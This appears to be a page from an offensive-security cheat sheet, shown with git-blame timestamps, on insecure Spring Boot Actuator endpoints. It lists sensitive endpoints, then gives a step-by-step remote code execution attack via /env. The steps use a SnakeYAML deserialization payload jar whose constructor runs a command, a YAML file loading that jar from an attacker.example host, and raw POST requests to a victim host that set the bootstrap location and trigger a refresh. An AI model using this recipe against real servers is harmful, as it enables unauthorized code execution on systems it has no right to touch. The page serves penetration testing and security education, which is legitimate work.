2022-10-12 10:13:55 +00:00
|
|
|
|
# Insecure Management Interface
|
2018-12-18 10:05:15 +00:00
|
|
|
|
|
2024-11-07 11:17:38 +00:00
|
|
|
|
## Summary
|
|
|
|
|
|
|
|
|
|
* [Springboot-Actuator](#springboot-actuator)
|
|
|
|
|
* [Remote Code Execution via /env](#remote-code-execution-via-env)
|
|
|
|
|
* [References](#references)
|
|
|
|
|
|
|
|
|
|
|
2018-12-18 10:05:15 +00:00
|
|
|
|
## Springboot-Actuator
|
|
|
|
|
|
2018-12-24 14:02:50 +00:00
|
|
|
|
Actuator endpoints let you monitor and interact with your application.
|
|
|
|
|
Spring Boot includes a number of built-in endpoints and lets you add your own.
|
2020-10-28 16:05:12 +00:00
|
|
|
|
For example, the `/health` endpoint provides basic application health information.
|
|
|
|
|
|
2018-12-24 14:02:50 +00:00
|
|
|
|
Some of them contains sensitive info such as :
|
2018-12-18 10:05:15 +00:00
|
|
|
|
|
2020-10-28 16:05:12 +00:00
|
|
|
|
- `/trace` - Displays trace information (by default the last 100 HTTP requests with headers).
|
|
|
|
|
- `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment).
|
|
|
|
|
- `/heapdump` - Builds and returns a heap dump from the JVM used by our application.
|
|
|
|
|
- `/dump` - Displays a dump of threads (including a stack trace).
|
|
|
|
|
- `/logfile` - Outputs the contents of the log file.
|
|
|
|
|
- `/mappings` - Shows all of the MVC controller mappings.
|
|
|
|
|
|
|
|
|
|
These endpoints are enabled by default in Springboot 1.X.
|
|
|
|
|
Note: Sensitive endpoints will require a username/password when they are accessed over HTTP.
|
|
|
|
|
|
|
|
|
|
Since Springboot 2.X only `/health` and `/info` are enabled by default.
|
|
|
|
|
|
|
|
|
|
### Remote Code Execution via `/env`
|
|
|
|
|
|
|
|
|
|
Spring is able to load external configurations in the YAML format.
|
|
|
|
|
The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks.
|
|
|
|
|
In other words, an attacker can gain remote code execution by loading a malicious config file.
|
|
|
|
|
|
|
|
|
|
#### Steps
|
|
|
|
|
|
|
|
|
|
1. Generate a payload of SnakeYAML deserialization gadget.
|
|
|
|
|
|
|
|
|
|
- Build malicious jar
|
|
|
|
|
```bash
|
|
|
|
|
git clone https://github.com/artsploit/yaml-payload.git
|
|
|
|
|
cd yaml-payload
|
|
|
|
|
# Edit the payload before executing the last commands (see below)
|
|
|
|
|
javac src/artsploit/AwesomeScriptEngineFactory.java
|
|
|
|
|
jar -cvf yaml-payload.jar -C src/ .
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
- Edit src/artsploit/AwesomeScriptEngineFactory.java
|
|
|
|
|
|
|
|
|
|
```java
|
|
|
|
|
public AwesomeScriptEngineFactory() {
|
|
|
|
|
try {
|
|
|
|
|
Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE
|
|
|
|
|
} catch (IOException e) {
|
|
|
|
|
e.printStackTrace();
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
- Create a malicious yaml config (yaml-payload.yml)
|
|
|
|
|
|
|
|
|
|
```yaml
|
|
|
|
|
!!javax.script.ScriptEngineManager [
|
|
|
|
|
!!java.net.URLClassLoader [[
|
|
|
|
|
!!java.net.URL ["http://attacker.example/yaml-payload.jar"]
|
|
|
|
|
]]
|
|
|
|
|
]
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
2. Host the malicious files on your server.
|
|
|
|
|
|
|
|
|
|
- yaml-payload.jar
|
|
|
|
|
- yaml-payload.yml
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
3. Change `spring.cloud.bootstrap.location` to your server.
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
POST /env HTTP/1.1
|
|
|
|
|
Host: victim.example:8090
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
Content-Length: 59
|
|
|
|
|
|
|
|
|
|
spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml
|
|
|
|
|
```
|
2018-12-18 10:05:15 +00:00
|
|
|
|
|
2020-10-28 16:05:12 +00:00
|
|
|
|
4. Reload the configuration.
|
2018-12-24 14:02:50 +00:00
|
|
|
|
|
2020-10-28 16:05:12 +00:00
|
|
|
|
```
|
|
|
|
|
POST /refresh HTTP/1.1
|
|
|
|
|
Host: victim.example:8090
|
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
Content-Length: 0
|
|
|
|
|
```
|
2018-12-24 14:02:50 +00:00
|
|
|
|
|
2024-11-07 11:17:38 +00:00
|
|
|
|
|
2018-12-24 14:02:50 +00:00
|
|
|
|
## References
|
|
|
|
|
|
2024-11-07 11:17:38 +00:00
|
|
|
|
- [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
|
|
|
|
|
- [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
|